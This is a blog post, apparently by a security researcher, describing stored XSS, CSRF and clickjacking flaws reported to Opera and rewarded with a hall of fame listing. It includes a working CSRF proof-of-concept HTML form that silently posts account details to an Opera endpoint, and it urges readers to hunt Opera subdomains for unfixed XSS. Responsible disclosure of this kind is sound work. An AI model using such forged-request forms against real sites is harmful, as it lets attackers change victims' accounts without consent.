Latest News

Stored XSS, CSRF And Clickjacking Vulnerabilities in Opera



Now a days, I am not much active in bug bounty programs, However, still i wanted to share my experience with Opera, Opera does not have a bug bounty program, However they certainly have their own way of thanking researchers by sending them some swag and listing their name under Hall of fame.

I reported few vulnerabilities to opera including a Stored XSS, CSRF and a clickjacking vulnerability. The POC's for the vulnerabilities are as follows:

Stored XSS 


The "Username" input was not being sanitized properly, Which resulted in an execution of javascript.

CSRF POC

The form was missing with CSRF tokens, An attacker could have used a CSRF attack in order to manipulate the form details.

POC

<html>
  
  <body>
    <form action="https://apps.opera.com/en_pk/account.php?action=details" method="POST">
      <input type="hidden" name="email" value="rafaybaloch&#64;gmail&#46;com" />
      <input type="hidden" name="name" value="Rafay&#32;Baloch" />
      <input type="hidden" name="address1" value="f&#45;10&#44;afasf&#32;afs&#32;asf&#32;1&#44;block&#32;15&#32;near&#32;income&#32;tax&#32;office&#44;asssssss&#45;e&#45;johar" />
      <input type="hidden" name="address2" value="" />
      <input type="hidden" name="city" value="Karachi" />
      <input type="hidden" name="state" value="" />
      <input type="hidden" name="country" value="PK" />
      <input type="hidden" name="zip" value="44000" />
      <input type="hidden" name="phone" value="&#43;923333333333" />
      <input type="submit" value="Submit form" />
    </form>
  </body>
</html>

Opera Hall Of Fame

So, For my findings, Opera listed my name under their hall of fame:



Gift from Opera

As a token of appreciation, they also send me the following gifts:


Opera is still sending some good stuff, I would recommend researchers to start looking opera's subdomains for low hanging fruits such as XSS, I know there is a lot of vulnerabilities out there unfixed.

No comments:

Post a Comment

Contact Us

24x7 online , we happy to answer you
tamilcypc@gmail.com

Disclaimer

This Blog and its TUT's are intended for educational purposes only, no-one involved in the creation of this TuT may be held responsible for any illegal acts brought about by this Blog or TuT.



Featured Post

Custom Domains And HTTPS Redirection Code